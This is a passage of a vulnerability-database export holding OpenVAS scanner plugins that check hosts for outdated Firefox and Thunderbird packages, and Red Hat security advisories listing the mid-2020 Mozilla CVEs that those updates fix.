host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in Thunderbird. If a user were\ntricked in to opening a specially crafted website in a browsing context,\nan attacker could potentially exploit these to cause a denial of service,\nobtain sensitive information, or execute arbitrary code. (CVE-2020-12405,\nCVE-2020-12406, CVE-2020-12410, CVE-2020-12417, CVE-2020-12418,\nCVE-2020-12419, CVE-2020-12420)\n\nIt was discovered that Thunderbird would continue an unencrypted\nconnection when configured to use STARTTLS for IMAP if the server\nresponded with PREAUTH. A remote attacker could potentially exploit\nthis to perform a person-in-the-middle attack in order to obtain\nsensitive information. (CVE-2020-12398)\n\nIt was discovered that NSS showed timing differences when performing DSA\nsignatures. An attacker could potentially exploit this to obtain private\nkeys using a timing attack. (CVE-2020-12399)\n\nIt was discovered that when performing add-on updates, certificate chains\nnot terminating with built-in roots were silently rejected. This could\nresult in add-ons becoming outdated. (CVE-2020-12421)\");\n\n script_tag(name:\"affected\", value:\"'thunderbird' package(s) on Ubuntu 20.04 LTS, Ubuntu 19.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU19.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:68.10.0+build1-0ubuntu0.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:68.10.0+build1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:68.10.0+build1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU20.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:68.10.0+build1-0ubuntu0.20.04.1\", rls:\"UBUNTU20.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:04:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12424", "CVE-2020-12417", "CVE-2020-12415", "CVE-2020-12418", "CVE-2020-12426", "CVE-2020-12425", "CVE-2020-12416", "CVE-2020-12420", "CVE-2020-12422", "CVE-2020-12421"], "description": "The remote host is missing an update for the ", "modified": "2020-07-21T00:00:00", "published": "2020-07-03T00:00:00", "id": "OPENVAS:1361412562310844488", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844488", "type": "openvas", "title": "Ubuntu: Security Advisory for firefox (USN-4408-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844488\");\n script_version(\"2020-07-21T08:11:15+0000\");\n script_cve_id(\"CVE-2020-12415\", \"CVE-2020-12416\", \"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12422\", \"CVE-2020-12424\", \"CVE-2020-12425\", \"CVE-2020-12426\", \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-21 10:01:45 +0000 (Tue, 21 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-03 03:01:52 +0000 (Fri, 03 Jul 2020)\");\n script_name(\"Ubuntu: Security Advisory for firefox (USN-4408-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU19\\.10|UBUNTU18\\.04 LTS|UBUNTU16\\.04 LTS|UBUNTU20\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4408-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-July/005496.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the USN-4408-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in Firefox. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to cause a denial of service, obtain sensitive\ninformation, bypass permission prompts, or execute arbitrary code.\n(CVE-2020-12415, CVE-2020-12416, CVE-2020-12417, CVE-2020-12418,\nCVE-2020-12419, CVE-2020-12420, CVE-2020-12422, CVE-2020-12424,\nCVE-2020-12425, CVE-2020-12426)\n\nIt was discovered that when performing add-on updates, certificate chains\nnot terminating with built-in roots were silently rejected. This could\nresult in add-ons becoming outdated. (CVE-2020-12421)\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on Ubuntu 20.04 LTS, Ubuntu 19.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU19.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"78.0.1+build1-0ubuntu0.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"78.0.1+build1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"78.0.1+build1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU20.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"78.0.1+build1-0ubuntu0.20.04.1\", rls:\"UBUNTU20.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:02:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12423", "CVE-2020-12424", "CVE-2020-12402", "CVE-2020-12417", "CVE-2020-12415", "CVE-2020-12418", "CVE-2020-12426", "CVE-2020-12425", "CVE-2020-12416", "CVE-2020-12420", "CVE-2020-12422", "CVE-2020-12421"], "description": "This host is installed with\n Mozilla Firefox and is prone to multiple vulnerabilities.", "modified": "2020-07-21T00:00:00", "published": "2020-07-02T00:00:00", "id": "OPENVAS:1361412562310817210", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817210", "type": "openvas", "title": "Mozilla Firefox Security Updates (Windows)-June 30 2020", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817210\");\n script_version(\"2020-07-21T08:11:15+0000\");\n script_cve_id(\"CVE-2020-12415\", \"CVE-2020-12416\", \"CVE-2020-12417\", \"CVE-2020-12418\",\n \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12402\", \"CVE-2020-12421\",\n \"CVE-2020-12422\", \"CVE-2020-12423\", \"CVE-2020-12424\", \"CVE-2020-12425\",\n \"CVE-2020-12426\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-21 10:01:45 +0000 (Tue, 21 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-02 10:56:32 +0530 (Thu, 02 Jul 2020)\");\n script_name(\"Mozilla Firefox Security Updates (Windows)-June 30 2020\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - AppCache manifest poisoning due to url encoded character processing.\n\n - Use-after-free in WebRTC VideoBroadcaster.\n\n - Memory corruption due to missing sign-extension for ValueTags on ARM64.\n\n - Information disclosure due to manipulated URL object.\n\n - Use-after-free in nsGlobalWindowInner.\n\n - Use-After-Free when trying to connect to a STUN server.\n\n - RSA Key Generation vulnerable to side-channel attack.\n\n - Add-On updates did not respect the same certificate trust rules as software updates.\n\n - Integer overflow in nsJPEGEncoder::emptyOutputBuffer.\n\n - DLL Hijacking due to searching %PATH% for a library.\n\n - WebRTC permission prompt could have been bypassed by a compromised content process.\n\n - Out of bound read in Date.parse().\n\n - Memory safety bugs fixed in Firefox 78.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to conduct a denial-of-service, execute arbitrary code or information disclosure\n on affected system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 78 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 78\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-24/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE) ) exit( 0 );\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"78.0\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"78.0\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:02:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12423", "CVE-2020-12424", "CVE-2020-12402", "CVE-2020-12417", "CVE-2020-12415", "CVE-2020-12418", "CVE-2020-12426", "CVE-2020-12425", "CVE-2020-12416", "CVE-2020-12420", "CVE-2020-12422", "CVE-2020-12421"], "description": "This host is installed with\n Mozilla Firefox and is prone to multiple vulnerabilities.", "modified": "2020-07-21T00:00:00", "published": "2020-07-02T00:00:00", "id": "OPENVAS:1361412562310817211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817211", "type": "openvas", "title": "Mozilla Firefox Security Updates (MacOSX)-June 30 2020", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817211\");\n script_version(\"2020-07-21T08:11:15+0000\");\n script_cve_id(\"CVE-2020-12415\", \"CVE-2020-12416\", \"CVE-2020-12417\", \"CVE-2020-12418\",\n \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12402\", \"CVE-2020-12421\",\n \"CVE-2020-12422\", \"CVE-2020-12423\", \"CVE-2020-12424\", \"CVE-2020-12425\",\n \"CVE-2020-12426\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-21 10:01:45 +0000 (Tue, 21 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-02 10:56:32 +0530 (Thu, 02 Jul 2020)\");\n script_name(\"Mozilla Firefox Security Updates (MacOSX)-June 30 2020\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - AppCache manifest poisoning due to url encoded character processing.\n\n - Use-after-free in WebRTC VideoBroadcaster.\n\n - Memory corruption due to missing sign-extension for ValueTags on ARM64.\n\n - Information disclosure due to manipulated URL object.\n\n - Use-after-free in nsGlobalWindowInner.\n\n - Use-After-Free when trying to connect to a STUN server.\n\n - RSA Key Generation vulnerable to side-channel attack.\n\n - Add-On updates did not respect the same certificate trust rules as software updates.\n\n - Integer overflow in nsJPEGEncoder::emptyOutputBuffer.\n\n - DLL Hijacking due to searching %PATH% for a library.\n\n - WebRTC permission prompt could have been bypassed by a compromised content process.\n\n - Out of bound read in Date.parse().\n\n - Memory safety bugs fixed in Firefox 78.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to conduct a denial-of-service, execute arbitrary code or information disclosure\n on affected system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 78 on MacOSX.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 78\n or later, Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-24/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE) ) exit( 0 );\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"78.0\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"78.0\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2020-07-15T07:55:20", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-07T00:25:50", "published": "2020-07-07T00:17:54", "id": "RHSA-2020:2824", "href": "https://access.redhat.com/errata/RHSA-2020:2824", "type": "redhat", "title": "(RHSA-2020:2824) Important: firefox security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T07:56:41", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-07T00:47:06", "published": "2020-07-07T00:39:44", "id": "RHSA-2020:2827", "href": "https://access.redhat.com/errata/RHSA-2020:2827", "type": "redhat", "title": "(RHSA-2020:2827) Important: firefox security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T07:57:14", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-07T00:21:20", "published": "2020-07-07T00:18:27", "id": "RHSA-2020:2825", "href": "https://access.redhat.com/errata/RHSA-2020:2825", "type": "redhat", "title": "(RHSA-2020:2825) Important: firefox security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T07:56:16", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-07T00:48:59", "published": "2020-07-07T00:40:34", "id": "RHSA-2020:2828", "href": "https://access.redhat.com/errata/RHSA-2020:2828", "type": "redhat", "title": "(RHSA-2020:2828) Important: firefox security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T07:56:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-07T00:45:06", "published": "2020-07-07T00:39:10", "id": "RHSA-2020:2826", "href": "https://access.redhat.com/errata/RHSA-2020:2826", "type": "redhat", "title": "(RHSA-2020:2826) Important: firefox security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-17T06:02:26", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421", "CVE-2020-15646"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 68.10.0.\n\nSecurity Fix(es):\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-17T08:49:46", "published": "2020-07-16T11:11:10", "id": "RHSA-2020:2966", "href": "https://access.redhat.com/errata/RHSA-2020:2966", "type": "redhat", "title": "(RHSA-2020:2966) Important: thunderbird security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-28T02:03:51", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421", "CVE-2020-15646"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 68.10.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-28T04:04:15", "published": "2020-07-21T18:16:22", "id": "RHSA-2020:3046", "href": "https://access.redhat.com/errata/RHSA-2020:3046", "type": "redhat", "title": "(RHSA-2020:3046) Important: thunderbird security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-17T06:03:19", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421", "CVE-2020-15646"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 68.10.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-17T08:49:56", "published": "2020-07-14T14:48:24", "id": "RHSA-2020:2907", "href": "https://access.redhat.com/errata/RHSA-2020:2907", "type": "redhat", "title": "(RHSA-2020:2907) Important: thunderbird security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-17T06:04:49", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421", "CVE-2020-15646"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 68.10.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-07-17T08:49:46", "published": "2020-07-14T14:48:23", "id": "RHSA-2020:2906", "href": "https://access.redhat.com/errata/RHSA-2020:2906", "type": "redhat", "title": "(RHSA-2020:2906) Important: thunderbird security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-28T00:05:59", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12419", "CVE-2020-12420", "CVE-2020-12421", "CVE-2020-15646"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 68.10.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": 